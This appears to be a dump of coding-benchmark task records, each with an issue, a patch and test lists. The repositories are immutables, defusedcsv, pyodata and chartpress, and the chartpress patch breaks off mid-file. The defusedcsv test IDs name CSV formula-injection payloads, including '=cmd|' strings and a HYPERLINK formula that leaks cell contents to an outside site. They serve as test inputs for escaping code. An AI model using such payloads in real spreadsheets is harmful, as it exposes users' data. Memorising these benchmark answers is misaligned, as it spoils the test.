"tests/test_map.py::PyMapTest::test_map_delete_2",
"tests/test_map.py::PyMapTest::test_map_delete_3",
"tests/test_map.py::PyMapTest::test_map_delete_4",
"tests/test_map.py::PyMapTest::test_map_delete_5",
"tests/test_map.py::PyMapTest::test_map_delete_6",
"tests/test_map.py::PyMapTest::test_map_eq_1",
"tests/test_map.py::PyMapTest::test_map_eq_2",
"tests/test_map.py::PyMapTest::test_map_eq_3",
"tests/test_map.py::PyMapTest::test_map_gc_1",
"tests/test_map.py::PyMapTest::test_map_gc_2",
"tests/test_map.py::PyMapTest::test_map_getitem_1",
"tests/test_map.py::PyMapTest::test_map_in_1",
"tests/test_map.py::PyMapTest::test_map_is_subscriptable",
"tests/test_map.py::PyMapTest::test_map_items_1",
"tests/test_map.py::PyMapTest::test_map_items_2",
"tests/test_map.py::PyMapTest::test_map_items_3",
"tests/test_map.py::PyMapTest::test_map_items_4",
"tests/test_map.py::PyMapTest::test_map_keys_1",
"tests/test_map.py::PyMapTest::test_map_keys_2",
"tests/test_map.py::PyMapTest::test_map_mut_1",
"tests/test_map.py::PyMapTest::test_map_mut_10",
"tests/test_map.py::PyMapTest::test_map_mut_11",
"tests/test_map.py::PyMapTest::test_map_mut_12",
"tests/test_map.py::PyMapTest::test_map_mut_13",
"tests/test_map.py::PyMapTest::test_map_mut_14",
"tests/test_map.py::PyMapTest::test_map_mut_15",
"tests/test_map.py::PyMapTest::test_map_mut_16",
"tests/test_map.py::PyMapTest::test_map_mut_17",
"tests/test_map.py::PyMapTest::test_map_mut_18",
"tests/test_map.py::PyMapTest::test_map_mut_19",
"tests/test_map.py::PyMapTest::test_map_mut_2",
"tests/test_map.py::PyMapTest::test_map_mut_20",
"tests/test_map.py::PyMapTest::test_map_mut_21",
"tests/test_map.py::PyMapTest::test_map_mut_4",
"tests/test_map.py::PyMapTest::test_map_mut_5",
"tests/test_map.py::PyMapTest::test_map_mut_6",
"tests/test_map.py::PyMapTest::test_map_mut_7",
"tests/test_map.py::PyMapTest::test_map_mut_8",
"tests/test_map.py::PyMapTest::test_map_mut_9",
"tests/test_map.py::PyMapTest::test_map_mut_stress",
"tests/test_map.py::PyMapTest::test_map_pickle",
"tests/test_map.py::PyMapTest::test_map_stress_01",
"tests/test_map.py::PyMapTest::test_map_stress_02",
"tests/test_map.py::PyMapTest::test_map_values_1",
"tests/test_map.py::PyMapTest::test_map_values_2",
"tests/test_map.py::PyMapTest::test_repr_2",
"tests/test_map.py::CMapTest::test_abc_1",
"tests/test_map.py::CMapTest::test_hash_1",
"tests/test_map.py::CMapTest::test_hash_2",
"tests/test_map.py::CMapTest::test_hashkey_helper_1",
"tests/test_map.py::CMapTest::test_kwarg_named_col",
"tests/test_map.py::CMapTest::test_map_basics_1",
"tests/test_map.py::CMapTest::test_map_basics_2",
"tests/test_map.py::CMapTest::test_map_basics_3",
"tests/test_map.py::CMapTest::test_map_basics_4",
"tests/test_map.py::CMapTest::test_map_collision_1",
"tests/test_map.py::CMapTest::test_map_collision_2",
"tests/test_map.py::CMapTest::test_map_delete_1",
"tests/test_map.py::CMapTest::test_map_delete_2",
"tests/test_map.py::CMapTest::test_map_delete_3",
"tests/test_map.py::CMapTest::test_map_delete_4",
"tests/test_map.py::CMapTest::test_map_delete_5",
"tests/test_map.py::CMapTest::test_map_delete_6",
"tests/test_map.py::CMapTest::test_map_eq_1",
"tests/test_map.py::CMapTest::test_map_eq_2",
"tests/test_map.py::CMapTest::test_map_eq_3",
"tests/test_map.py::CMapTest::test_map_gc_1",
"tests/test_map.py::CMapTest::test_map_gc_2",
"tests/test_map.py::CMapTest::test_map_getitem_1",
"tests/test_map.py::CMapTest::test_map_in_1",
"tests/test_map.py::CMapTest::test_map_is_subscriptable",
"tests/test_map.py::CMapTest::test_map_items_1",
"tests/test_map.py::CMapTest::test_map_items_2",
"tests/test_map.py::CMapTest::test_map_items_3",
"tests/test_map.py::CMapTest::test_map_items_4",
"tests/test_map.py::CMapTest::test_map_keys_1",
"tests/test_map.py::CMapTest::test_map_keys_2",
"tests/test_map.py::CMapTest::test_map_mut_1",
"tests/test_map.py::CMapTest::test_map_mut_10",
"tests/test_map.py::CMapTest::test_map_mut_11",
"tests/test_map.py::CMapTest::test_map_mut_12",
"tests/test_map.py::CMapTest::test_map_mut_13",
"tests/test_map.py::CMapTest::test_map_mut_14",
"tests/test_map.py::CMapTest::test_map_mut_15",
"tests/test_map.py::CMapTest::test_map_mut_16",
"tests/test_map.py::CMapTest::test_map_mut_17",
"tests/test_map.py::CMapTest::test_map_mut_18",
"tests/test_map.py::CMapTest::test_map_mut_19",
"tests/test_map.py::CMapTest::test_map_mut_2",
"tests/test_map.py::CMapTest::test_map_mut_20",
"tests/test_map.py::CMapTest::test_map_mut_21",
"tests/test_map.py::CMapTest::test_map_mut_4",
"tests/test_map.py::CMapTest::test_map_mut_5",
"tests/test_map.py::CMapTest::test_map_mut_6",
"tests/test_map.py::CMapTest::test_map_mut_7",
"tests/test_map.py::CMapTest::test_map_mut_8",
"tests/test_map.py::CMapTest::test_map_mut_9",
"tests/test_map.py::CMapTest::test_map_mut_stress",
"tests/test_map.py::CMapTest::test_map_pickle",
"tests/test_map.py::CMapTest::test_map_stress_01",
"tests/test_map.py::CMapTest::test_map_stress_02",
"tests/test_map.py::CMapTest::test_map_values_1",
"tests/test_map.py::CMapTest::test_map_values_2",
"tests/test_map.py::CMapTest::test_repr_2",
"tests/test_none_keys.py::PyMapNoneTest::test_collision_4",
"tests/test_none_keys.py::PyMapNoneTest::test_iterators",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collision_2",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collision_3",
"tests/test_none_keys.py::PyMapNoneTest::test_none_collisions",
"tests/test_none_keys.py::PyMapNoneTest::test_none_mutation",
"tests/test_none_keys.py::PyMapNoneTest::test_none_set",
"tests/test_none_keys.py::CMapNoneTest::test_collision_4",
"tests/test_none_keys.py::CMapNoneTest::test_iterators",
"tests/test_none_keys.py::CMapNoneTest::test_none_collision_2",
"tests/test_none_keys.py::CMapNoneTest::test_none_collision_3",
"tests/test_none_keys.py::CMapNoneTest::test_none_collisions",
"tests/test_none_keys.py::CMapNoneTest::test_none_mutation",
"tests/test_none_keys.py::CMapNoneTest::test_none_set"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks",
"has_pytest_match_arg"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-02-08 17:28:05+00:00
|
apache-2.0
| 335
|
|
raphaelm__defusedcsv-6
|
diff --git a/defusedcsv/csv.py b/defusedcsv/csv.py
index 2656c96..a027b85 100644
--- a/defusedcsv/csv.py
+++ b/defusedcsv/csv.py
@@ -1,20 +1,28 @@
import re
from csv import (
QUOTE_ALL, QUOTE_MINIMAL, QUOTE_NONE, QUOTE_NONNUMERIC, Dialect,
- DictReader, DictWriter as BaseDictWriter, Error, Sniffer, excel, excel_tab,
+ DictReader, DictWriter as _BaseDictWriter, Error, Sniffer, excel, excel_tab,
field_size_limit, get_dialect, list_dialects, reader, register_dialect,
- unix_dialect, unregister_dialect, writer as basewriter,
+ unix_dialect, unregister_dialect, writer as _basewriter,
+ __doc__,
)
+from numbers import Number
+
+from . import version as __version__
__all__ = ["QUOTE_MINIMAL", "QUOTE_ALL", "QUOTE_NONNUMERIC", "QUOTE_NONE",
- "Error", "Dialect", "excel", "excel_tab", "field_size_limit", "reader", "writer",
+ "Error", "Dialect", "__doc__", "excel", "excel_tab",
+ "field_size_limit", "reader", "writer",
"register_dialect", "get_dialect", "list_dialects", "Sniffer",
- "unregister_dialect", "DictReader", "DictWriter", "unix_dialect"]
+ "unregister_dialect", "__version__", "DictReader", "DictWriter",
+ "unix_dialect"]
-def escape(payload):
+def _escape(payload):
if payload is None:
return ''
+ if isinstance(payload, Number):
+ return payload
payload = str(payload)
if payload and payload[0] in ('@', '+', '-', '=', '|', '%') and not re.match("^-?[0-9,\\.]+$", payload):
@@ -23,25 +31,30 @@ def escape(payload):
return payload
-class ProxyWriter:
+class _ProxyWriter:
def __init__(self, writer):
self.writer = writer
def writerow(self, row):
- self.writer.writerow([escape(field) for field in row])
+ try:
+ iter(row)
+ except TypeError as err:
+ msg = "iterable expected, not %s" % type(row).__name__
+ raise Error(msg) from err
+ return self.writer.writerow([_escape(field) for field in row])
def writerows(self, rows):
- self.writer.writerows([[escape(field) for field in row] for row in rows])
+ return self.writer.writerows([[_escape(field) for field in row] for row in rows])
def __getattr__(self, item):
return getattr(self.writer, item)
def writer(csvfile, dialect='excel', **fmtparams):
- return ProxyWriter(basewriter(csvfile, dialect, **fmtparams))
+ return _ProxyWriter(_basewriter(csvfile, dialect, **fmtparams))
-class DictWriter(BaseDictWriter):
+class DictWriter(_BaseDictWriter):
def __init__(self, f, fieldnames, restval="", extrasaction="raise",
dialect="excel", *args, **kwds):
super().__init__(f, fieldnames, restval, extrasaction, dialect, *args, **kwds)
|
raphaelm/defusedcsv
|
26062bce682fa1ff99d43bde8332fb6e6ac970c0
|
diff --git a/tests/test_escape.py b/tests/test_escape.py
index fa14347..93e2a50 100644
--- a/tests/test_escape.py
+++ b/tests/test_escape.py
@@ -1,5 +1,5 @@
import pytest
-from defusedcsv.csv import escape
+from defusedcsv.csv import _escape as escape
@pytest.mark.parametrize("input,expected", [
@@ -44,9 +44,14 @@ def test_dangerous_sample_payloads(input, expected):
"Test | Foo",
"",
None,
+])
+def test_safe_sample_payloads(input):
+ assert escape(input) == (str(input) if input is not None else '')
+
+@pytest.mark.parametrize("input", [
1,
2,
True
])
-def test_safe_sample_payloads(input):
- assert escape(input) == (str(input) if input is not None else '')
+def test_safe_nonstr_sample_payloads(input):
+ assert escape(input) == input
diff --git a/tests/test_unmodified.py b/tests/test_unmodified.py
index e1d1326..e2548c3 100644
--- a/tests/test_unmodified.py
+++ b/tests/test_unmodified.py
@@ -32,6 +32,9 @@ def test_has_attributes():
assert hasattr(csv, 'QUOTE_NONNUMERIC')
assert hasattr(csv, 'QUOTE_NONE')
assert hasattr(csv, 'Error')
+ assert hasattr(csv, 'writer')
+ assert hasattr(csv, '__doc__')
+ assert hasattr(csv, '__version__')
def test_dialect_registry():
|
writer.writerow() does not return anything
The stdlib python csv writer will return the row (as string) when calling `writer.writerow(row)`. The `defusedcsv` proxy is not handing the value along though.
```
from defusedcsv import csv
class EchoWriter:
def write(self, value):
return value
pseudo_buffer = Echo()
writer = csv.writer(pseudo_buffer)
value = writer.writerow(["foo", "bar""])
```
That returns `None`. When using stock `csv`, it'll return `"foo,bar"`.
I admit, the above example may be a bit convoluted and there may be better ways to do this. However for maximum compatibility with the stdlib csv library it might make sense to mimic this behaviour.
|
0.0
|
26062bce682fa1ff99d43bde8332fb6e6ac970c0
|
[
"tests/test_escape.py::test_dangerous_sample_payloads[=1+1-'=1+1_0]",
"tests/test_escape.py::test_dangerous_sample_payloads[-1+1-'-1+1]",
"tests/test_escape.py::test_dangerous_sample_payloads[+1+1-'+1+1]",
"tests/test_escape.py::test_dangerous_sample_payloads[=1+1-'=1+1_1]",
"tests/test_escape.py::test_dangerous_sample_payloads[@A3-'@A3]",
"tests/test_escape.py::test_dangerous_sample_payloads[%1-'%1]",
"tests/test_escape.py::test_dangerous_sample_payloads[|1+1-'\\\\|1+1]",
"tests/test_escape.py::test_dangerous_sample_payloads[=1|2-'=1\\\\|2]",
"tests/test_escape.py::test_dangerous_sample_payloads[=cmd|'",
"tests/test_escape.py::test_dangerous_sample_payloads[@SUM(1+1)*cmd|'",
"tests/test_escape.py::test_dangerous_sample_payloads[-2+3+cmd|'",
"tests/test_escape.py::test_dangerous_sample_payloads[=HYPERLINK(\"http://contextis.co.uk?leak=\"&A1&A2,\"Error:",
"tests/test_escape.py::test_safe_sample_payloads[1+2]",
"tests/test_escape.py::test_safe_sample_payloads[1]",
"tests/test_escape.py::test_safe_sample_payloads[Foo]",
"tests/test_escape.py::test_safe_sample_payloads[1.3]",
"tests/test_escape.py::test_safe_sample_payloads[1,2]",
"tests/test_escape.py::test_safe_sample_payloads[-1.3]",
"tests/test_escape.py::test_safe_sample_payloads[-1,2]",
"tests/test_escape.py::test_safe_sample_payloads[Foo",
"tests/test_escape.py::test_safe_sample_payloads[1-2]",
"tests/test_escape.py::test_safe_sample_payloads[1=3]",
"tests/test_escape.py::test_safe_sample_payloads[foo@example.org]",
"tests/test_escape.py::test_safe_sample_payloads[19.00",
"tests/test_escape.py::test_safe_sample_payloads[Test",
"tests/test_escape.py::test_safe_sample_payloads[]",
"tests/test_escape.py::test_safe_sample_payloads[None]",
"tests/test_escape.py::test_safe_nonstr_sample_payloads[1]",
"tests/test_escape.py::test_safe_nonstr_sample_payloads[2]",
"tests/test_escape.py::test_safe_nonstr_sample_payloads[True]",
"tests/test_unmodified.py::test_read",
"tests/test_unmodified.py::test_has_attributes",
"tests/test_unmodified.py::test_dialect_registry"
] |
[] |
{
"failed_lite_validators": [],
"has_test_patch": true,
"is_lite": true
}
|
2022-04-08 12:22:53+00:00
|
apache-2.0
| 5,174
|
|
SAP__python-pyodata-149
|
diff --git a/pyodata/v2/model.py b/pyodata/v2/model.py
index 5412ca9..67cc1ad 100644
--- a/pyodata/v2/model.py
+++ b/pyodata/v2/model.py
@@ -21,6 +21,8 @@ from lxml import etree
from pyodata.exceptions import PyODataException, PyODataModelError, PyODataParserError
LOGGER_NAME = 'pyodata.model'
+FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = False
+FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = False
IdentifierInfo = collections.namedtuple('IdentifierInfo', 'namespace name')
TypeInfo = collections.namedtuple('TypeInfo', 'namespace name is_collection')
@@ -414,8 +416,19 @@ class EdmDateTimeTypTraits(EdmPrefixedTypTraits):
try:
# https://stackoverflow.com/questions/36179914/timestamp-out-of-range-for-platform-localtime-gmtime-function
value = datetime.datetime(1970, 1, 1, tzinfo=current_timezone()) + datetime.timedelta(milliseconds=int(value))
- except ValueError:
- raise PyODataModelError(f'Cannot decode datetime from value {value}.')
+ except (ValueError, OverflowError):
+ if FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE and int(value) < -62135596800000:
+ # Some service providers return false minimal date values.
+ # -62135596800000 is the lowest value PyOData could read.
+ # This workaroud fixes this issue and returns 0001-01-01 00:00:00+00:00 in such a case.
+ value = datetime.datetime(year=1, day=1, month=1, tzinfo=current_timezone())
+ elif FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE and int(value) > 253402300799999:
+ value = datetime.datetime(year=9999, day=31, month=12, tzinfo=current_timezone())
+ else:
+ raise PyODataModelError(f'Cannot decode datetime from value {value}. '
+ f'Possible value range: -62135596800000 to 253402300799999. '
+ f'You may fix this by setting `FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE` '
+ f' or `FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE` as a workaround.')
return value
|
SAP/python-pyodata
|
9a3694d553c64e781923e11f6fbc28af67b01bc3
|
diff --git a/tests/test_model_v2.py b/tests/test_model_v2.py
index ca72430..8f7ecef 100644
--- a/tests/test_model_v2.py
+++ b/tests/test_model_v2.py
@@ -9,6 +9,7 @@ from pyodata.v2.model import Schema, Typ, StructTypeProperty, Types, EntityType,
PolicyIgnore, Config, PolicyFatal, NullType, NullAssociation, current_timezone, StructType
from pyodata.exceptions import PyODataException, PyODataModelError, PyODataParserError
from tests.conftest import assert_logging_policy
+import pyodata.v2.model
def test_edmx(schema):
@@ -537,10 +538,20 @@ def test_traits_datetime():
assert testdate.microsecond == 0
assert testdate.tzinfo == current_timezone()
+ # parsing below lowest value with workaround
+ pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = True
+ testdate = typ.traits.from_json("/Date(-62135596800001)/")
+ assert testdate.year == 1
+ assert testdate.month == 1
+ assert testdate.day == 1
+ assert testdate.tzinfo == current_timezone()
+
# parsing the lowest value
- with pytest.raises(OverflowError):
+ pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = False
+ with pytest.raises(PyODataModelError) as e_info:
typ.traits.from_json("/Date(-62135596800001)/")
-
+ assert str(e_info.value).startswith('Cannot decode datetime from value -62135596800001.')
+
testdate = typ.traits.from_json("/Date(-62135596800000)/")
assert testdate.year == 1
assert testdate.month == 1
@@ -551,9 +562,19 @@ def test_traits_datetime():
assert testdate.microsecond == 0
assert testdate.tzinfo == current_timezone()
+ # parsing above highest value with workaround
+ pyodata.v2.model.FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = True
+ testdate = typ.traits.from_json("/Date(253402300800000)/")
+ assert testdate.year == 9999
+ assert testdate.month == 12
+ assert testdate.day == 31
+ assert testdate.tzinfo == current_timezone()
+
# parsing the highest value
- with pytest.raises(OverflowError):
+ pyodata.v2.model.FIX_SCREWED_UP_MAXIMUM_DATETIME_VALUE = False
+ with pytest.raises(PyODataModelError) as e_info:
typ.traits.from_json("/Date(253402300800000)/")
+ assert str(e_info.value).startswith('Cannot decode datetime from value 253402300800000.')
testdate = typ.traits.from_json("/Date(253402300799999)/")
assert testdate.year == 9999
|
Date out of range error
According to #80 we facing the same error. We're just consumer using the api to receive data for our DWH. Currently one of our job fails because of this error.
Is it possible to implement a fix for this problem on pyodata side?
Json:
```
{
"d": {
"results": {
"__metadata": {
"uri": "https://service.url/sap/c4c/odata/v1/c4codataapi/CorporateAccountIdentificationCollection('12345678910111213ABCDEFGHIJKLMNO')",
"type": "c4codata.CorporateAccountIdentification",
"etag": "W/"datetimeoffset'2021-02-01T19%3A41%3A17.9430080Z'""
},
"ObjectID": "12345678910111213ABCDEFGHIJKLMNO",
"ParentObjectID": "166345678910111213ABCDEFGHIJKLMNO",
"ETag": "/Date(1612208477943)/",
"AccountID": "12345",
"IDTypeCode": "ABCDE",
"IDTypeCodeText": "<ABCD12>",
"IDNumber": "1234-123",
"ResponsibleInstitution": "",
"EntryDate": null,
"ValidFrom": "/Date(-62135769600000)/",
"ValidTo": "/Date(253402214400000)/",
"CountryCode": "",
"CountryCodeText": "",
"StateCode": "",
"StateCodeText": "",
"ZZWECK_KUT": "",
"ZZWECK_KUTText": "",
"CorporateAccount": {
"__deferred": {
"uri": "https://service.url/sap/c4c/odata/v1/c4codataapi/CorporateAccountIdentificationCollection('12345678910111213ABCDEFGHIJKLMNO')/CorporateAccount"
}
}
}
}
}
```
Thanks & BR
|
0.0
|
9a3694d553c64e781923e11f6fbc28af67b01bc3
|
[
"tests/test_model_v2.py::test_traits_datetime"
] |
[
"tests/test_model_v2.py::test_edmx",
"tests/test_model_v2.py::test_schema_entity_type_nullable",
"tests/test_model_v2.py::test_schema_entity_sets",
"tests/test_model_v2.py::test_edmx_associations",
"tests/test_model_v2.py::test_edmx_navigation_properties",
"tests/test_model_v2.py::test_edmx_function_imports",
"tests/test_model_v2.py::test_edmx_complex_types",
"tests/test_model_v2.py::test_edmx_complex_type_prop_vh",
"tests/test_model_v2.py::test_traits",
"tests/test_model_v2.py::test_traits_collections",
"tests/test_model_v2.py::test_type_parsing",
"tests/test_model_v2.py::test_types",
"tests/test_model_v2.py::test_complex_serializer",
"tests/test_model_v2.py::test_annot_v_l_missing_e_s",
"tests/test_model_v2.py::test_annot_v_l_missing_e_t",
"tests/test_model_v2.py::test_annot_v_l_trgt_inv_prop",
"tests/test_model_v2.py::test_namespace_with_periods",
"tests/test_model_v2.py::test_edmx_entity_sets",
"tests/test_model_v2.py::test_config_set_default_error_policy",
"tests/test_model_v2.py::test_null_type",
"tests/test_model_v2.py::test_faulty_association",
"tests/test_model_v2.py::test_faulty_association_set",
"tests/test_model_v2.py::test_missing_association_for_navigation_property",
"tests/test_model_v2.py::test_edmx_association_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_entity_set",
"tests/test_model_v2.py::test_missing_data_service",
"tests/test_model_v2.py::test_missing_schema",
"tests/test_model_v2.py::test_namespace_whitelist",
"tests/test_model_v2.py::test_unsupported_edmx_n",
"tests/test_model_v2.py::test_unsupported_schema_n",
"tests/test_model_v2.py::test_whitelisted_edm_namespace",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2006_04",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2007_05",
"tests/test_model_v2.py::test_enum_parsing",
"tests/test_model_v2.py::test_unsupported_enum_underlying_type",
"tests/test_model_v2.py::test_enum_value_out_of_range",
"tests/test_model_v2.py::test_missing_property_referenced_in_annotation",
"tests/test_model_v2.py::test_struct_type_has_property_initial_instance",
"tests/test_model_v2.py::test_struct_type_has_property_no",
"tests/test_model_v2.py::test_struct_type_has_property_yes"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_issue_reference"
],
"has_test_patch": true,
"is_lite": false
}
|
2021-03-19 13:12:21+00:00
|
apache-2.0
| 665
|
|
jupyterhub__chartpress-63
|
diff --git a/.travis.yml b/.travis.yml
index a47cf03..998bf51 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -5,11 +5,12 @@ cache: pip
install:
- set -e
- pip install --upgrade pip
- - pip install pyflakes .
+ - pip install pyflakes pytest .
script:
- chartpress --version
- chartpress --help
- pyflakes .
+ - pytest -v ./tests
# This is a workaround to an issue caused by the existence of a docker
# registrymirror in our CI environment. Without this fix that removes the
diff --git a/CHANGELOG.md b/CHANGELOG.md
index fdbd930..f6b591c 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,23 @@
## 0.4
+### 0.4.3
+
+- Support `valuesPath` pointing to a single `image:tag` string in
+ addition to a dict with separate `repository` and `tag` keys.
+- Support lists in `valuesPath` by using integer indices,
+ e.g. `section.list.1.image` for the yaml:
+
+ ```yaml
+ section:
+ list:
+ - first: item
+ image: "not set"
+ - second: item
+ image: "image:tag" # <--sets this here
+ ```
+
+
### 0.4.2
- --long flag to always output build information in image tags and chart version [#57](https://github.com/jupyterhub/chartpress/pull/57) ([@consideRatio](https://github.com/consideRatio))
diff --git a/README.md b/README.md
index 7dbf6a9..6caa976 100644
--- a/README.md
+++ b/README.md
@@ -157,3 +157,19 @@ in your `.travis.yml`:
git:
depth: false
```
+
+## Development
+
+Testing of this python package can be done using [`pyflakes`](https://github.com/PyCQA/pyflakes) and [`pytest`](https://github.com/pytest-dev/pytest). There is also some additional testing that is only run as part of TravisCI, as declared in [`.travis.yml`](.travis.yml).
+
+```
+# install chartpress locally
+pip install -e .
+
+# install dev dependencies
+pip install pyflakes pytest
+
+# run tests
+pyflakes .
+pytest -v
+```
diff --git a/chartpress.py b/chartpress.py
index df0fb19..f6847da 100755
--- a/chartpress.py
+++ b/chartpress.py
@@ -10,6 +10,7 @@ from collections.abc import MutableMapping
from functools import lru_cache, partial
import os
import pipes
+import re
import shutil
import subprocess
from tempfile import TemporaryDirectory
@@ -55,29 +56,42 @@ def git_remote(git_repo):
return 'git@github.com:{0}'.format(git_repo)
-def last_modified_commit(*paths, **kwargs):
- """Get the last commit to modify the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%h',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+def latest_tag_or_mod_commit(*paths, **kwargs):
+ """
+ Get the latest of a) the latest tagged commit, or b) the latest modification
+ commit to provided path.
+ """
+ latest_modification_commit = check_output(
+ [
+ 'git', 'log',
+ '--max-count=1',
+ '--pretty=format:%h',
+ '--',
+ *paths,
+ ],
+ **kwargs,
+ ).decode('utf-8').strip()
+ git_describe_head = check_output(
+ [
+ 'git', 'describe', '--tags', '--long'
+ ],
+ **kwargs,
+ ).decode('utf-8').strip().rsplit("-", maxsplit=2)
+ latest_tagged_commit = git_describe_head[2][1:]
-def last_modified_date(*paths, **kwargs):
- """Return the last modified date (as a string) for the given paths"""
- return check_output([
- 'git',
- 'log',
- '-n', '1',
- '--pretty=format:%cd',
- '--date=iso',
- '--',
- *paths
- ], **kwargs).decode('utf-8').strip()
+ try:
+ check_call(
+ [
+ 'git', 'merge-base', '--is-ancestor', latest_tagged_commit, latest_modification_commit,
+ ],
+ **kwargs,
+ )
+ except subprocess.CalledProcessError:
+ # latest_tagged_commit was newer than latest_modification_commit
+ return latest_tagged_commit
+ else:
+ return latest_modification_commit
def render_build_args(image_options, ns):
@@ -179,7 +193,55 @@ def image_needs_building(image):
return image_needs_pushing(image)
-def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_build=False, long=False):
+def _get_identifier(tag, n_commits, commit, long):
+ """
+ Returns a chartpress formatted chart version or image tag (identifier) with
+ a build suffix.
+
+ This function should provide valid Helm chart versions, which means they
+ need to be valid SemVer 2 version strings. It also needs to return valid
+ image tags, which means they need to not contain `+` signs either.
+
+ Example:
+ tag="0.1.2", n_commits="5", commit="asdf1234", long=True,
+ should return "0.1.2-005.asdf1234".
+ """
+ n_commits = int(n_commits)
+
+ if n_commits > 0 or long:
+ if "-" in tag:
+ # append a pre-release tag, with a . separator
+ # 0.1.2-alpha.1 -> 0.1.2-alpha.1.n.sha
+ return f"{tag}.{n_commits:03d}.{commit}"
+ else:
+ # append a release tag, with a - separator
+ # 0.1.2 -> 0.1.2-n.sha
+ return f"{tag}-{n_commits:03d}.{commit}"
+ else:
+ return f"{tag}"
+
+
+def _strip_identifiers_build_suffix(identifier):
+ """
+ Return a stripped chart version or image tag (identifier) without its build
+ suffix (.005.asdf1234), leaving it to represent a Semver 2 release or
+ pre-release.
+
+ Example:
+ identifier: "0.1.2-005.asdf1234" returns: "0.1.2"
+ identifier: "0.1.2-alpha.1.005.asdf1234" returns: "0.1.2-alpha.1"
+ """
+ # split away official SemVer 2 build specifications if used
+ if "+" in identifier:
+ return identifier.split("+", maxsplit=1)[0]
+
+ # split away our custom build specification: something ending in either
+ # . or - followed by three or more digits, a dot, an commit sha of four
+ # or more alphanumeric characters.
+ return re.sub(r'[-\.]\d{3,}\.\w{4,}\Z', "", identifier)
+
+
+def build_images(prefix, images, tag=None, push=False, chart_version=None, skip_build=False, long=False):
"""Build a collection of docker images
Args:
@@ -191,9 +253,9 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
to modify the image's files.
push (bool):
Whether to push the resulting images (default: False).
- chart_tag (str):
- The latest chart tag, included as a prefix on image tags
- if `tag` is not specified.
+ chart_version (str):
+ The latest chart version, trimmed from its build suffix, will be included
+ as a prefix on image tags if `tag` is not specified.
skip_build (bool):
Whether to skip the actual image build (only updates tags).
long (bool):
@@ -204,38 +266,35 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
Example 1:
- long=False: 0.9.0
- - long=True: 0.9.0_000.asdf1234
+ - long=True: 0.9.0-000.asdf1234
Example 2:
- - long=False: 0.9.0_004.sdfg2345
- - long=True: 0.9.0_004.sdfg2345
+ - long=False: 0.9.0-004.sdfg2345
+ - long=True: 0.9.0-004.sdfg2345
"""
value_modifications = {}
for name, options in images.items():
image_path = options.get('contextPath', os.path.join('images', name))
image_tag = tag
+ chart_version = _strip_identifiers_build_suffix(chart_version)
# include chartpress.yaml itself as it can contain build args and
# similar that influence the image that would be built
paths = list(options.get('paths', [])) + [image_path, 'chartpress.yaml']
- last_image_commit = last_modified_commit(*paths)
- if tag is None:
- n_commits = int(check_output(
+ image_commit = latest_tag_or_mod_commit(*paths, echo=False)
+ if image_tag is None:
+ n_commits = check_output(
[
'git', 'rev-list', '--count',
- # Note that the 0.0.1 chart_tag may not exist as it was a
+ # Note that the 0.0.1 chart_version may not exist as it was a
# workaround to handle git histories with no tags in the
- # current branch. Also, if the chart_tag is a later git
- # reference than the last_image_commit, this command will
- # return 0.
- f'{chart_tag + ".." if chart_tag != "0.0.1" else ""}{last_image_commit}',
+ # current branch. Also, if the chart_version is a later git
+ # reference than the image_commit, this
+ # command will return 0.
+ f'{"" if chart_version == "0.0.1" else chart_version + ".."}{image_commit}',
],
echo=False,
- ).decode('utf-8').strip())
-
- if n_commits > 0 or long:
- image_tag = f"{chart_tag}_{int(n_commits):03d}-{last_image_commit}"
- else:
- image_tag = f"{chart_tag}"
+ ).decode('utf-8').strip()
+ image_tag = _get_identifier(chart_version, n_commits, image_commit, long)
image_name = prefix + name
image_spec = '{}:{}'.format(image_name, image_tag)
@@ -251,7 +310,7 @@ def build_images(prefix, images, tag=None, push=False, chart_tag=None, skip_buil
build_args = render_build_args(
options,
{
- 'LAST_COMMIT': last_image_commit,
+ 'LAST_COMMIT': image_commit,
'TAG': image_tag,
},
)
@@ -277,27 +336,49 @@ def build_values(name, values_mods):
values = yaml.load(f)
for key, value in values_mods.items():
+ if not isinstance(value, dict) or set(value.keys()) != {'repository', 'tag'}:
+ raise ValueError(f"I only understand image updates with 'repository', 'tag', not: {value!r}")
parts = key.split('.')
- mod_obj = values
+ mod_obj = parent = values
for p in parts:
+ if p.isdigit():
+ # integers are indices in lists
+ p = int(p)
+ parent = mod_obj
mod_obj = mod_obj[p]
- print(f"Updating {values_file}: {key}: {value}")
+ last_part = p
if isinstance(mod_obj, MutableMapping):
keys = IMAGE_REPOSITORY_KEYS & mod_obj.keys()
if keys:
- for key in keys:
- mod_obj[key] = value['repository']
+ for repo_key in keys:
+ before = mod_obj.get(repo_key, None)
+ if before != value['repository']:
+ print(f"Updating {values_file}: {key}.{repo_key}: {value}")
+ mod_obj[repo_key] = value['repository']
else:
possible_keys = ' or '.join(IMAGE_REPOSITORY_KEYS)
raise KeyError(
f'Could not find {possible_keys} in {values_file}:{key}'
)
+ before = mod_obj.get('tag', None)
+ if before != value['tag']:
+ print(f"Updating {values_file}: {key}.tag: {value}")
mod_obj['tag'] = value['tag']
+ elif isinstance(mod_obj, str):
+ # scalar image string, not dict with separate repository, tag keys
